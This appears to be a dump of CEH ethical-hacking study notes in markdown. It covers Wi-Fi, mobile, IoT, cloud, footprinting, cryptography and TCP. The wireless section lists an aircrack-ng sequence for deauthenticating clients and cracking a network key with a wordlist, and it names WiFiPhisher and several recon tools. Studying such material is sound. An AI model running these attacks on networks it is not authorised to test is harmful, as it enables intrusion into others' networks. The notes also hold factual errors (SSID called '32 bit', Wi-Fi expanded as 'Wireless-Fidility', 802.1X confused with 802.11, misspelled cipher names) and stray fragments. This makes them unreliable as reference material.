| # Terms 2 | **Wireless network** is a computer network that uses wireless data connection between network nodes. 3 | **Access Point**: Access Point (AP) or Wireless Access Point (WAP) is a hardware device that allows wireless connectivity to the end devices. 4 | **Service Set Identifier (SSID)**: A 32 bit identification string of the Access Point, the AP's name. SSID inserted into the header of every data packet. 5 | **Basic Service Set Identifier (BSSID)**: MAC address of the Access Point. 6 | 7 | # Wi-FI 8 | Wi-Fi is a local area networking technology based on the IEEE 802.11 standard. 9 | Wi-Fi stands for Wireless-Fidility 10 | In 1999, Six companies come together and form a global non-profit association, regardless of brand, using a new wireless networking technology. 11 | In 2000, the group adopted the term **Wi-Fi** for its technical work and announce its official name **Wi-Fi Alliance**. 12 | 13 | # Wireless Standards 14 | **802.1X** is a set of standards that has set of rules which allow wired and wireless peripherals to work with each other. like Mobile with Router, Computer with Router, etc. We have Different Sub-Protocols in 802.11 Family which are categorized as per their Frequency and Modulation technique. 15 | 16 | | Protocol | Frequency | Max Data Speed | 17 | |:---------:|:-----------:|:--------------:| 18 | | 802.11a | 5 GHz | 54 Mbps | 19 | | 802.11b | 2.4 GHz | 11 Mbps | 20 | | 802.11g | 2.4 Ghz | 54 Mbps | 21 | | 802.11n | 2.4/5 Ghz | 450 Mbps | -> **Can handle a single device at a time** 22 | | 802.11ac | 5 Ghz | 866.7 Mbps | -> **Can handle 4 devices at a time** -- 23 | 24 | # Wi-Fi latest version and their speed 25 | | Protocol | Version | Speed | 26 | |:--------:|:-------:|:--------:| 27 | | 802.11n | Wi-Fi 4 | 600 Mb/s | -> **802.11n is renamed as Wi-Fi 4** 28 | | 802.11ac | Wi-Fi 5 | 3.5 Gb/s | -> **802.11ac is renamed as Wi-fi 5** 29 | | 802.11ax | Wi-Fi 6 | 9.6 Gb/s | <- **Latest and fastest we can use, can handle 8 devices at a time** 30 | 31 | # Authentication Progress 32 | **Open System Authentication** - In open system Authentication, client sent Authentication request from device that contain the Station ID (Typically the MAC Address). And Receive Authentication Response from AP/Router with a success or Failure message. 33 | **Shared Key Authentication** - In Shared key Authentication, a shared key, or passphrase, is manually set on both the mobile device and the AP/router for comparison. Authentication depends on match result. 34 | 35 | # Wardriving 36 | Wardriving is the act of searching for Wi-Fi wireless networks by a person usually in a moving vehicle, using a laptop or smartphone. 37 | 38 | # Types of Wireless Antennas 39 | # Directional Antenna 40 | Direction antennas are designed to function in a specific direction to improve efficiency 41 | Use case: Dish Antennas 42 | # Omnidirectional antennas 43 | Omnidirectional antenna radiates equal radio power in all directions. 44 | Use cases: radio broadcasting, cell phones, GPS 45 | -------------------------------------------------------------------------------------------------------------- 46 | ## Wireless Encryption 47 | 48 | # Wired Equivalent Privacy (WEP) - 1997 49 | - Designed to provide the same level of security as that of a wired LAN 50 | - WEP is Standard protocol before 2004 51 | - Use Pre-shared Key, and plain text transmission. 52 | 53 | # Wi-Fi Protected Access (WPA) - 2003 by Wi-Fi Alliance 54 | - Used for WLAN network based on 802.11i 55 | - Use RADIUS (**Remote Authentication Dial-In User Service**) Server 56 | - Only fesible for Corporate giants who can setup their Server, Not fesible for normal users 57 | 58 | # WPA2 - 2004 59 | - Strong Encryption AES (Advanced Encryption Standard) - 128-256 bit key 60 | - In WPA2, when user try to connect with AP/Router, key is Encrypted by AES and then transmitted. 61 | 62 | # Wireless Threats 63 | - **Access Control Attacks** : evading access control parameters (MAC spoofing point) 64 | - **Confidentiality Attacks** : traffic analysis, session hijacking, MITM, etc... 65 | - **Availability Attacks** : prevent user from accessing the wireless network (flooding, ARP poisoning, De-Authentication attacks) 66 | - **Authentication Attacks** : steal identity information or impersonating clients (password cracking, password guessing) 67 | - **Rogue Access Point** : a fake access point in a place with the legitimate one, with the same SSID to monitor victims activity by sniffing packets. 68 | - **Misconfigured Access Point Attacks** : default or week password, Open Authentication 69 | - **Jamming Signal Attacks** : jamming or blocking the wireless communication, causing a denial of service 70 | -------------------------------------------------------------------------------------------------------------- 71 | # Hacking Methodology 72 | 73 | # Wi-Fi Discovery 74 | - Passive footprinting (sniffing packets) 75 | - Active footprinting (probing the AP to get information) 76 | 77 | # Wireless Traffic Analysis 78 | - Capture the packets to reveal any information (SSID, authentication method, ...) 79 | 80 | # Launch Attacks 81 | - ARP poisoning - Poisoning the ARP cache of Target machine, so that Attacker AP/Router send Victims Traffic to Attacker. 82 | - MAC spoofing - Using False MAC Address 83 | - Attacker Send De-Authentication request with spoofed 84 | - Rogue access point - Installing Rogue access point in secure network without authorization of network Admin. 85 | - MITM - Man-In-The-Middle Attacks. 86 | 87 | # Wireless Security Tools 88 | # Wireless Intrusion Prevention System (WIPS) 89 | - Monitors the wireless network 90 | - Protect against unauthorized access points 91 | - Perform automatic intrusion prevention 92 | - Monitors the radio spectrum to prevents rogue access point and alert the network administrator 93 | - Can detect AP misconfiguration 94 | - Detect honeypots 95 | - Mitigate DoS 96 | 97 | # Wi-Fi Countermeasures 98 | - Change default parameters 99 | - Disable remote login to wireless devices 100 | - Use strong password - use passphrases 101 | - Use the latest standards (WPA2 AES) 102 | - MAC filtering 103 | - Update software often 104 | - Enable firewall 105 | -------------------------------------------------------------------------------------------------------------- 106 | # Aircrack Suite 107 | - Airmon-ng 108 | - Airodump-ng 109 | - Aireplay-ng 110 | - Aircrack-ng 111 | 112 | -> **airmon-ng start ** // Using that interface for network monitoring 113 | -> **airmon-ng check kill** // Killing Processes which may cause trouble 114 | -> **airodump-ng ** // We need AP/Router MAC Address 115 | -> **airodump-ng -w --bssid ** // Start Capturing packets 116 | -> **aireplay-ng --deauth 0 -a ** // We send DE-Authentication packets to Target Access Point 117 | -> **aircrack-ng -w ** // This will prompt us for Network Selection. Try to Crack Key with help of Wordlist 118 | -------------------------------------------------------------------------------------------------------------- 119 | # WiFiPhisher 120 | This tool use phishing attack to get WiFi password. 121 | - https://www.youtube.com/watch?v=8dhGWYCfrBc 122 | -------------------------------------------------------------------------------------------------------------- 123 | -------------------------------------------------------------------------------- /Module 16 - Wireless Networks/Infographic_20_years_of_Wi-Fi_0.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SNGWN/CEH-Notes/b456452938ea58dfaa7cbbfa1cbd33e641374b37/Module 16 - Wireless Networks/Infographic_20_years_of_Wi-Fi_0.pdf -------------------------------------------------------------------------------- /Module 17 - Mobile Platform/17_Hacking_Mobile_Platforms.md: -------------------------------------------------------------------------------- 1 | ## Mobile Platform Attack Vectors 2 | 3 | ### OWASP Top 10 Mobile Threats 4 | 5 | [OWASP Mobile Security Project](https://www.owasp.org/index.php/OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks) maintain a list 6 | of the most common mobile security risks. 7 | 8 | # Top Ten (2014) 9 | 10 | 1. Weak Server Side Controls 11 | 2. Insecure Data Storage 12 | 3. Insufficient Transport Layer Protection 13 | 4. Unintended Data Leakage 14 | 5. Poor Authorization and Authentication 15 | 6. Broken Cryptography 16 | 7. Client Side Injection 17 | 8. Security Decisions via Untrusted Inputs 18 | 9. Improper Session Handling 19 | 10. Lack of Binary Protections 20 | 21 | # Top Ten (2016) 22 | 23 | 1. **Improper Platform Usage**: misuse of a platform feature or failure to use a platform security controls 24 | 2. **Insecure Data Storage**: insecure data storage + unintended data leakage 25 | 3. **Insecure Communication**: poor handshaking, incorrect SSL, weak negotiation, cleartext communication of sensitive assets, ... 26 | 4. **Insecure Authentication**: captures notions of authenticating the end user or bad session management 27 | 5. **Insufficient Cryptography**: cryptography was attempted, but it wasn't done correctly 28 | 6. **Insecure Authorization**: capture any failures in authorization 29 | 7. **Client Code Quality**: all of the code-level implementation problem in the mobile client 30 | 8. **Code Tampering**: binary patching, local resource modification, method hooking, dynamic memory modification, ... 31 | 9. **Reverse Engineering**: analysis of the final core binary to determine the source code, libraries, ... 32 | 10. **Extraneous Functionality**: internal development security controls that are not intended to be released into a production environment 33 | 34 | # Basic Threats 35 | - Malwares (Trojans, Rootkits, Ransomware, etc.) 36 | - Data Loss 37 | - Data Tampering 38 | 39 | # OS Sandboxing Issue 40 | - Sandbox is a security mechanism for separating running programs, usually in an effort to mitigate system failures or software vulnerabilities from spreading 41 | - Sandbox limits the app's access to files, preferences, network resources, ... 42 | - Advanced malware designed to bypass it, by fragment code or put sleep timer in the script to bypass the inspection process 43 | 44 | # Rooting 45 | - A process of allowing user to attain privileged control 46 | - Needed for modify settings, get full control over the kernel or install custom ROMs 47 | 48 | ## iOS 49 | **Jailbreaking** 50 | - Rooting the iOS 51 | - Escalating the privileges on iOS to remove or bypass the factory default restrictions 52 | 53 | # Types of Jailbreaking 54 | - **Userland Exploit** : allow user-level access without escalating iBoot-level access 55 | - **iBoot Exploit** : allow user-level and boot-level access 56 | - **Bootrom Exploit** : allow user-level and boot-level access 57 | 58 | # Jailbreaking Techniques 59 | **Untethered Jailbreak** 60 | - Does not require to reboot with a connection to your computer 61 | - Exploit bypass the iBoot sequence 62 | 63 | **Tethered Jailbreak** 64 | - Need a connection to your computer to reboot, without it, the boot stuck with an Apple logo 65 | - Offers complete jailbreak features 66 | 67 | **Semi-Untethered Jailbreak** 68 | - Allows to boot into the iOS device, but with limited functionality 69 | - The jailbreak functions will be disabled until the launch of a jailbreak app 70 | 71 | **Semi-Tethered Jailbreak** 72 | - Allows you to boot with limited functionality 73 | - To get the full functionality, a reboot with a tethered jailbreak required 74 | - Semi-Tethered Jailbreak: tethered jailbreak + a package to allow reboot with limited functionality 75 | 76 | # Windows Phone 77 | - Windows Phone 8 using the Windows NT Kernel 78 | - Windows Phone 8 include app sandboxing, remote device management, native code support (C++) 79 | 80 | # BlackBerry OS 81 | - Support for Java Micro Edition MIDP 1.0 and MIDP 2.0 82 | - OS update with BlackBerry over the air software loading service (OTASL) 83 | 84 | # Bring Your Own Device (BYOD) 85 | BYOD is a trend of employees using their personal devices for work. It could be a laptop, a phone, etc... 86 | 87 | # BYOD Policies 88 | BYOD policies should include: 89 | - Device: which devices and operating systems are supported 90 | - Password: require all devices to be password protected 91 | - Access: determine which data can be accessed from employee's device 92 | - Application: which applications allowed, which should be banned 93 | 94 | # Mobile Security Guideline 95 | - Avoid auto-upload of files 96 | - Perform security assessment of applications 97 | - Turn off Bluetooth - Blue Born Attack 98 | - Allow only necessary GPS-enabled applications 99 | - Do not connect to open network 100 | - Install applications from trusted sources 101 | - Use strong password 102 | - Use Mobile Device Management (MDM) softwares 103 | - Update operating system often 104 | - Do not allow rooting / jailbreaking 105 | - Encrypt phone storage 106 | - Periodic backup 107 | -------------------------------------------------------------------------------- /Module 18 - IOT Hacking/18_IoT_Hacking.md: -------------------------------------------------------------------------------- 1 | ## Basic 2 | The Internet of things (IoT) is the network of devices, vehicles, and home appliances that contain electronics, software, actuators, and connectivity which allows these things to connect, interact and exchange data. 3 | 4 | IoT involves extending Internet connectivity beyond standard devices, such as desktops, laptops, smartphones and tablets, to any range of traditionally dumb or non-internet-enabled physical devices and everyday objects. 5 | 6 | Embedded with technology, these devices can communicate and interact over the Internet, and they can be remotely monitored and controlled. 7 | 8 | ## Main Components 9 | 1. Sensors 10 | 2. Device 11 | 3. Gateway 12 | 4. Cloud 13 | 14 | ## IoT Architecture 15 | 1. **Perception Layer** : sensors that gather information about the environment (heat sensor, pressure sensor, Blood Pressure Sensor, etc.) 16 | 2. **Transport Layer** : transfer the sensor data through network (Wi-Fi, Bluetooth, ...) 17 | 3. **Processing Layer** : stores, processes, analyses data (cloud computing, big data, ...) 18 | 4. **Application Layer** : delivering application specific services to the user 19 | 20 | ## IoT Technologies 21 | - IoT uses IPv6 due to the limited number of IPv4 addresses 22 | 23 | ### Wireless Transmission Mechanism 24 | - Bluetooth Low Energy (BLE) - Blue Born ---> Class C (10 M) 25 | - Wi-FI ---> 30 M - 250 M 26 | - Radio-Frequency Identification (RFID) - Range 01-30m --> Active RFID --- Passive RFID ---- Semi Active/Passive RFID Tags 27 | - Near-Field Communication (NFC) - Range 10cm 28 | - LTE-Advanced : formally submitted as a candidate 4G, often being described as 3.9G (beyond 3G but pre-4G) 29 | - Wi-Fi HaLow : uses 900MHz to provide extended range, lower energy consumption - Renge of around **1Km** 30 | - Low-Power Wild-Area Network (LPWAN) : designed to allow long range communication at a low bit rate among things. Range around **10 km** 31 | - Cellular - Range from **8KM - 40KM** 32 | 33 | ### Wired Communication 34 | - Ethernet 35 | - Power-Line Communication (PLC) : using electrical wiring to carry power and data 36 | 37 | ### Operating System 38 | - Linux on embedded systems 39 | - Windows IoT 40 | - RTOS - Real time OS 41 | - AWS IoT - 42 | 43 | ## IoT Communication Models 44 | ### Device-To-Device Model 45 | - The devices communicating with each other without interfering any other device 46 | - Using communication medium such as a wireless network 47 | 48 | ### Device-To-Cloud Model 49 | - The IoT device directly communicating with the application server 50 | - The application server provide information exchange between these devices 51 | 52 | ### Device-To-Gateway Model 53 | - Gateway collects the data from the sensors, then send it to the application server 54 | - Gateway provides security or information and protocol translation 55 | 56 | ### Back-End Data-Sharing Model 57 | - Used a collective partnership between different application providers 58 | - Access granted to the uploaded data to third-parties 59 | - An extended Device-To-Cloud model 60 | 61 | ## Challenges to IoT 62 | - Lack of security 63 | - Vulnerable interfaces 64 | - Physical security risk 65 | - Lack of vendor support 66 | - Difficult of update firmware and OS -> 67 | - Interoperability issues 68 | 69 | ## OWASP Top Ten IoT (2014) 70 | 1. Insecure web interface 71 | 2. Insufficient authentication / authorization 72 | 3. Insecure network services 73 | 4. Lack of transport encryption / integrity verification 74 | 5. Privacy concerns 75 | 6. Insecure cloud interface 76 | 7. Insecure mobile interface 77 | 8. Insufficient security configurability 78 | 9. Insecure software / hardware 79 | 10. Poor physical security 80 | 81 | ## Common Attacks 82 | - Device memory containing credentials 83 | - Access control 84 | - Firmware extraction 85 | - Privilege escalation 86 | - Resetting to an insecure state 87 | - Removal of storage media 88 | - Web attacks 89 | - Firmware attack 90 | - Network service attacks 91 | - Unencrypted local data storage 92 | - Confidentiality and integrity issues 93 | - Cloud computing attacks 94 | - Malicious updates --> 95 | - Insecure APIs ---> login ---> OAuth ---> 96 | - Mobile application threats 97 | - DoS / DDoS 98 | - Rolling Code Attack: attacker capture signal from transmitter device, simultaneously blocking the receiver to receive 99 | the signal, later it will used to gain unauthorized access (steal car with captured signal) 100 | - BlueBorn Attack: using different exploits to gain unauthorized access to the target device 101 | - Jamming Attack: jamming the signal to prevent the communication of devices 102 | - Backdoor (not just IoT related) 103 | - Eavesdropping 104 | - Man-in-the-middle attack 105 | - Replay attack 106 | - Forged malicious devices 107 | - Ransomware attack 108 | 109 | ## Hacking Methodology 110 | 111 | ### Information Gathering 112 | - IP address 113 | - Running protocols 114 | - Open ports 115 | - Type of device 116 | - Vendor 117 | - [shodan](https://www.shodan.io/) is a helpful search engine for IoT 118 | 119 | ### Vulnerability Scanning 120 | - Scanning the network and devices to find vulnerabilities 121 | - Search for weak password 122 | - Software and firmware vulnerabilities 123 | - Tools: nmap, hping, ... 124 | 125 | ### Attack 126 | - Exploiting vulnerabilities 127 | - Tools: HackRF 128 | 129 | ### Gain Access 130 | - Gain unauthorized access 131 | - Privilege escalation 132 | - Install backdoor 133 | 134 | ### Maintain Attack 135 | - Logging out 136 | - Clearing logs 137 | - Covering tracks 138 | 139 | ## Countermeasures 140 | - Firmware update 141 | - Block unnecessary ports 142 | - Disable telnet 143 | - Use encrypted communication (SSL/TLS) 144 | - Use strong password - passphrases 145 | - Encrypt drives 146 | - Periodic assessment of devices 147 | - Secure password recovery 148 | - Two-Factor Authentication - 149 | - Disable UPnP 150 | -------------------------------------------------------------------------------- /Module 19 - Cloud Computing/19_Cloud_Computing.md: -------------------------------------------------------------------------------- 1 | # Basic 2 | Cloud computing is shared pools of configurable computer system resources and higher-level services that can be rapidly provisioned with minimal management effort, often over the Internet. Third-party clouds enable organizations to focus on their core businesses instead of expending resources on computer infrastructure and maintenance. Advocates note that cloud computing allows companies to avoid or minimize up-front IT infrastructure costs. Proponents also claim that cloud computing allows enterprises to get their applications up and running faster, with improved manageability and less maintenance. 3 | 4 | # Characteristics of Cloud Computing 5 | - Increase users flexibility 6 | - Cost reduction 7 | - Device and location independence 8 | - Distributed storage 9 | - Automated management 10 | - Virtualization 11 | - Measured services 12 | 13 | # Cloud Computing Service Models 14 | **Infrastructure as a Service (IaaS)** 15 | The capability provided to the consumer is to provision processing, storage, networks, and other fundamental computing resources where the consumer is able to deploy and run arbitrary software, which can include operating systems and applications. The consumer does not manage or control the underlying cloud infrastructure but has control over operating systems, storage, and deployed applications and possibly limited control of select networking components (e.g., host firewalls). 16 | **Platform as a Service (PaaS)** 17 | The capability provided to the consumer is to deploy onto the cloud infrastructure consumer-created or acquired applications created using programming languages, libraries, services, and tools supported by the provider. The consumer does not manage or control the underlying cloud infrastructure including network, servers, operating systems, or storage, but has control over the deployed applications and possibly configuration settings for the application-hosting environment. 18 | **Software as a Service (SaaS)** 19 | The capability provided to the consumer is to use the provider’s applications running on a cloud infrastructure. The applications are accessible from various client devices through either a thin client interface, such as a web browser (e.g., web-based email), or a program interface. The consumer does not manage or control the underlying cloud infrastructure including network, servers, operating systems, storage, or even individual application capabilities, with the possible exception of limited user-specific application configuration settings. 20 | 21 | # Cloud Computing Deployment Module 22 | **Private Cloud** 23 | The cloud infrastructure is provisioned for exclusive use by a single organization comprising multiple consumers (e.g., business units). It may be owned, managed, and operated by the organization, a third party, or some combination of them, and it may exist on or off premises. 24 | **Public Cloud** 25 | The cloud infrastructure is provisioned for open use by the general public. It may be owned, managed, and operated by a business, academic, or government organization, or some combination of them. It exists on the premises of the cloud provider. 26 | **Hybrid Cloud** 27 | The cloud infrastructure is a composition of two or more distinct cloud infrastructures (private, community, or public) that remain unique entities, but are bound together by standardized or proprietary technology that enables data and application portability (e.g., cloud bursting for load balancing between clouds). 28 | **Community Cloud** 29 | The cloud infrastructure is provisioned for exclusive use by a specific community of consumers from organizations that have shared concerns (e.g., mission, security requirements, policy, and compliance considerations). It may be owned, managed, and operated by one or more of the organizations in the community, a third party, or some combination of them, and it may exist on or off premises. 30 | 31 | # Actors 32 | **Cloud Consumer** : A person or organization that maintains a business relationship with, and uses services from cloud providers. 33 | **Cloud Provider** : A company or individual that delivers cloud computing based services and solutions to businesses and/or individuals. 34 | **Cloud Auditor** : A party that can conduct an independent assessment of cloud services. 35 | **Cloud Broker** : An entity that manages the use, performance and delivery of cloud services, negotiates relationships between providers and consumers. 36 | **Cloud Carrier** : An intermediary that provides connectivity and transport of cloud services from providers to consumers. 37 | 38 | # Cloud Computing Threads 39 | - Data loss / breach 40 | - Virtualization level attacks 41 | - Service termination and failure 42 | - Malicious insider 43 | - Hardware failure 44 | - Weak authentication 45 | - Privilege escalation 46 | - Loss of logs 47 | 48 | # Cloud Computing Attacks 49 | - Social engineering attacks (password guessing, ...) 50 | - XSS attacks 51 | - DNS attacks (DNS poisoning, domain hijacking, ...) 52 | - SQL injection 53 | - Network sniffing (obtain credentials, cookies, ...) 54 | - Session hijacking (cookie stealing, ...) 55 | - Cryptanalysis (weak encryption, ...) 56 | - DoS / DDoS 57 | 58 | # Cloud Security 59 | **Application Layer** 60 | - Application firewall (filter and observe traffic) 61 | - Secure Systems Development Life Cycle (SSDLC) 62 | - Binary Code Analysis 63 | - Script analysis 64 | - Transactional security 65 | 66 | **Network Layer** 67 | - Next Generation IPS / IDS (NGIPS / NGIDS) 68 | - Firewalls 69 | - Anti-DDoS 70 | 71 | **Information** 72 | - Provide confidentiality and integrity 73 | - Data Loss Prevention (DLP) 74 | 75 | **Computer and Storage** 76 | - Host-based IPS / IDS (HIDS/HIPS) 77 | - Integrity check 78 | - File system monitoring 79 | - Log file analysis 80 | - Connection analysis 81 | - Storage encryption 82 | 83 | **Physical Security** 84 | - Physical protection is priority 85 | - Protect against theft, unauthorized physical access, environmental impact (rain, earthquake, power failure, ...) 86 | 87 | # Responsibilities in Cloud Security 88 | **Cloud Service Provider** 89 | - Web Application Firewall (WAF) 90 | - Firewall 91 | - Data Loss Prevention (DLP) 92 | - Intrusion Prevention System (IPS) 93 | - Application Security (App Sec) 94 | - Virtual Private Network (VPN) 95 | - Load Balancer 96 | 97 | **Cloud Service Consumer** 98 | - Public Key Infrastructure (PKI) 99 | - Security System Development Life Cycle (SSDLC) 100 | - Firewall 101 | - Encryption 102 | - Intrusion Prevention System (IPS) 103 | - Application Security 104 | - Virtual Private Network (VPN) 105 | 106 | # Countermeasures and Security Considerations 107 | - Disaster Recovery Plan 108 | - Load Balancing 109 | - Data Integrity 110 | - Patching and updates 111 | - SSL/TLS 112 | - Cryptography implementation 113 | - Quality of Service (QoS) 114 | - Monitoring 115 | -------------------------------------------------------------------------------- /Module 2 :-: FootPrinting.md: -------------------------------------------------------------------------------- 1 | # Footprinting & Reconnaissance 2 | Collecting info regarding internal and external security architecture. Foot printing and Recon help attacker to reduce focus area and bring closer to the target. Collect information about a target network. 3 | - Active Footprinting : Collect info with Direct interaction 4 | - Passive Footprinting : Collect info without direct interaction 5 | Methods: 6 | Web App Footprinting 7 | - Public Emails - Email Addresses available on Webpages. 8 | - WHOIS - WHOIS give us info about Domain like when registered, expiry, owner, etc. 9 | - IP Geolocation - Geolocation of Server and Organization. 10 | - Wayback URLs - Analyse changes made in web app over time, collect all API endpoints, directories, comments from JS file and HTML files. Check Archive.org for this. 11 | - Technology - Check what different frameworks, languages, there versions are used in constructing web app. Use tools such as Wappalyzer, Built-with, etc 12 | - Directory - Perform dictionary check on web app for directories exposed by application through tools such as dirb, gobuster, etc. 13 | DNS Footprinting 14 | - A - Server IPv4 Address 15 | - AAAA - Server IPv6 Address 16 | - MX - Mail Server used for handling Emails for that domain. 17 | - TTL - Time to Live (After how many hops packet will be discarded) 18 | - CNAME - Provides additional names or aliases for the address record 19 | Social Engineering 20 | - Eavesdropping - process of intercepting unauthorized communication to gather information. 21 | - Shoulder Surfing - Secretly observing the target to gather sensitive information like passwords, personal identification information, account information etc. 22 | - Dumpster Diving: This is a process of collecting sensitive information by. looking into the trash/bin. 23 | -------------------------------------------------------------------------------------------------- 24 | # K1). User Recon Techniques 25 | - UserRecon - (Tool) - https://github.com/issamelferkh/userrecon.git 26 | git clone https://github.com/issamelferkh/userrecon.git 27 | - This tool search for username on 75 different Social media sites. 28 | - ./userrecon - Enter Name 29 | - sherlock - Simmilar to user recon 30 | python3 sherlock 31 | - theHarvester - theHarvester --source 32 | - Job Sites - (LinkedIn, indeed, monster.com, etc.) 33 | - Social Searcher 34 | - This Website search for user name on different Social media Platform. User Search is not limited to 1 search per website. 35 | 36 | ---------------------------------------------------------------- 37 | # K2). Google Dorks & Google Hacking Database (GHDB) 38 | - Intitle : Matches Given String to Page Title. (intitle:Owasp top 10) 39 | - InText : Matches Given String with string in Text. (intitle:How to become a Hacker") 40 | - Site : Limit the search to a specific site only. (site:drive.google.com) 41 | - Inurl : Matches Given String with string in URL. (inurl:twitter.com) 42 | - Filetype : Matches File Type with Search Query. (filetype:pdf) 43 | - Exploit DB https://Exploit-db.com/google-hacking-database 44 | 45 | ---------------------------------------------------------------- 46 | # K3). Domain Recon Technique 47 | - website-informer - IP Address, Owner Email, Sub Domains, DNS, Registrar 48 | - whois.domaintools.com - IP Address, Sub Domains, DNS, Registrar, other sited registered on same Server(If Any). 49 | - Shodan - Shodan is a Device Search Engine. Shodan search for devices accessible through internet. 50 | - Search for Devices running that services 51 | - Search for Devices connected to that organization 52 | - search for Devices based on location 53 | - search for open devices like Camera, Printer, Router, IOT Devices, TVs, etc 54 | - Builtwith.com / Wappalyzer 55 | - This website tell us about Technology used to build website. like Google Analytics, Chatbots, Programming Languages, E-Commerce Technology, etc. 56 | - DnsDumpster.com 57 | - Provide Information about Domain Name 58 | - DnsTwister - https://dnstwister.report/ 59 | - This website show domain with similar name which are registered or available. 60 | - Dirb - Directory Buster 61 | - Sublist3r - Identify subdomains 62 | 63 | ---------------------------------------------------------------- 64 | # K4). Tools can be used for Footprinting 65 | - Maltego - Maltego is a GUI based tool which search for all Connections of Domain with Server, other Websites, MX Servers and other domains connected to these mail servers or other domains hosted on same server. 66 | - Gobuster - Analyse application DNS, Directory, GCP, etc 67 | - Burp Suite - GUI framework to perform all kind of SAST/DAST scan on web apps including information gathering. 68 | ---------------------------------------------------------------- 69 | # K5). Information collected 70 | - Organization Information - Phone Numbers, Employee Details, Email Addresses, Physical Location, etc 71 | - Relation with other companies - Other Organizations Client working with. 72 | - Network Information - Different Networks, Running Services, Domains, Mail Server, etc. 73 | - System Information - OS, Architecture, etc 74 | -------------------------------------------------------------------------------- /Module 20 - Cryptography/20_Cryptography.md: -------------------------------------------------------------------------------- 1 | ## Terms -> module 1 -> module 20 2 | - **Clear text / plaintext**: the unencrypted data 3 | - **Cipher text**: the encrypted data 4 | - **Key**: specifies the transformation of data for encryption / decryption ("key" is not synonymous with "password", although a password can in fact be used as a key) 5 | - **Cipher**: an algorithm for performing encryption and decryption 6 | 7 | # Symmetric cryptography 8 | - Use the same key for the encryption and the decryption 9 | - Symmetric-key either use stream cipher and block cipher 10 | - Popular algorithms: AES, DES 11 | 12 | # Asymmetric / Public Key cryptography 13 | - Two key used: public and private 14 | - Public key is publicly known to everyone, issued by Public Key Infrastructure (PKI) and use to encrypt the data 15 | - Private key is a secret for the public,only known by the owner and it is used to decrypt the data 16 | - Asymmetric cryptography delivers confidentiality, integrity, authenticity and non-repudiation 17 | - Popular algorithms : RSA, DSA and Diffie-Hellman, ECDHA 18 | ------------------------------------------------------------------------------------------------------ 19 | # Substitution Cipher 20 | - Every character is substituted with another one 21 | - More on [Wikipedia](https://en.wikipedia.org/wiki/Substitution_cipher) 22 | - Example cipher : [Caesar cipher](https://en.wikipedia.org/wiki/Caesar_cipher) 23 | 24 | Example: 25 | ``` 26 | Plaintext : THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG 27 | Ciphertext : QEB NRFZH YOLTK CLU GRJMP LSBO QEB IXWV ALD 28 | 29 | Key : right shift of 3 30 | ``` 31 | 32 | # Transposition Cipher 33 | - The positions held by units of plaintext are shifted according to a regular system 34 | - Example cipher [Rail Fence cipher](https://en.wikipedia.org/wiki/Rail_fence) 35 | 36 | Example: 37 | ``` 38 | Clear text: WE ARE DISCOVERED. FLEE AT ONCE 39 | 40 | W . . . E . . . C . . . R . . . L . . . T . . . E 00..........00..........00 41 | . E . R . D . S . O . E . E . F . E . A . O . C . ...00....00....00....00... 42 | . . A . . . I . . . V . . . D . . . E . . . N . . ......00..........00...... 43 | 44 | Ciphertext: WECRLTEERDSOEEFEAOCAIVDEN 45 | ``` 46 | 47 | # Polyalphabetic Cipher 48 | - Based on substitution 49 | - Using multiple substitution alphabets 50 | - Example cipher : [Vigenère cipher](https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher) 51 | 52 | # Stream Cipher 53 | - Text digits are combined with a pseudorandom cipher digit stream (keystream) 54 | - Each plaintext digit is encrypted one at a time with the corresponding digit of the stream 55 | - Example cipher: RC4, Salsalsa 20, Cacha20 56 | 57 | # Block Cipher 58 | - Operating on fixed-length groups of bits, called a block, with an unvarying transformation that is specified by a symmetric key 59 | - Example cipher: AES, DES, 3DES, 2DES 60 | 61 | # Symmetric Algorithms 62 | 63 | # Data Encryption Standard (DES) 64 | - Introduced in 1975 65 | - Standardized in 1977 by NIST 66 | - Problem with DES: short key length (56 bits) -> ASICS Chips 67 | - Now considered as insecure 68 | - Improved version: Triple DES (involves DES three times) 69 | - Problem with Triple DES: slow, compute heavy 70 | 71 | # Parameters 72 | | Parameter | Value | 73 | |:-----------------:|:--------:| 74 | | Block size | 64 bits | 75 | | Key size | 56 bits | --> ffffffff -> 76 | | No. of rounds | 16 | 77 | 78 | 79 | # Advanced Encryption Standard (AES) 80 | - First published in 1998-1999 - 2000 81 | - Became a federal government standard in 2002 82 | - First approved (and only) publicly accessible cipher approved by the NSA for top secret information 83 | 84 | # Parameters 85 | | Parameter | AES-128 value | AES-192 value | AES-256 value | 86 | |:-----------------:|:------------------:|:-----------------:|:------------------:| 87 | | Block size | 128 bits | 128 bits | 128 bits | 88 | | Key size | 128 bits | 192 bits | 256 bits | 89 | | No. of rounds | 10 | 12 | 14 | 90 | 91 | # Modes of Operations 92 | - Electronic Code Book (ECB) 93 | - Cipher Block Chaining (CBC) 94 | - Output Feedback Mode (OFB) 95 | - Galois/Counter Mode (GCM) 96 | 97 | # Hashing 98 | Generating a unique Alphanumeric String for a short of Characters, Program, Application, Files, etc. 99 | Avalanche Effect --> If you change a binary bit, Hash Value Will Change Drastically. This is Called Avalanche Effect. 100 | Collision --> 101 | -------------------------------------------------------------------------------- /Module 3 :-: Network Scanning.md: -------------------------------------------------------------------------------- 1 | ## TCP vs UDP 2 | - TCP and UDP (Transmission Control Protocol and User Datagram Protocol) are communications protocol that facilitate the exchange of message (in form of Packets) between computer devices in a network. These protocols decide how packet will reach the destination. 65535 3 | TCP UDP 4 | - Connection Oriented Protocol - Connection Less protocol 5 | - Provides Error checking - No Error Checking Mechanism 6 | - Guarantees Delivery of Data - No Guarantees of Data Delivery 7 | - Slower and less efficient for fast transmission - Faster Transmission 8 | - All Packets follow the same path - Packets can follow any path to reach destination 9 | - Automimic Retransmission possible - Retransmission is not possible in case of Packets loss 10 | --------------------------------------------------- 11 | ## TCP Flags: 12 | - SYN : Sync flag is used to Initiate 3 way handshake between hosts. 13 | - ACK : Acknowledgment flag is used to acknowledge the successful receipt of a packet. 14 | - FIN : The Finished flag means there is no more data from the sender. 1GB --> 50000 --> 1,2,3,4,5,6,.........50000 (FIN) 15 | - URG : The Urgent flag is used to notify the receiver to process the urgent packets before processing all other packets. 16 | - PSH : The Push flag is somewhat similar to the URG flag and tells the receiver to process these packets as they are received instead of buffering them. 17 | - RST : Reset a Connection 18 | --------------------------------------------------- 19 | ## TCP 3 Way Handshake: 20 | 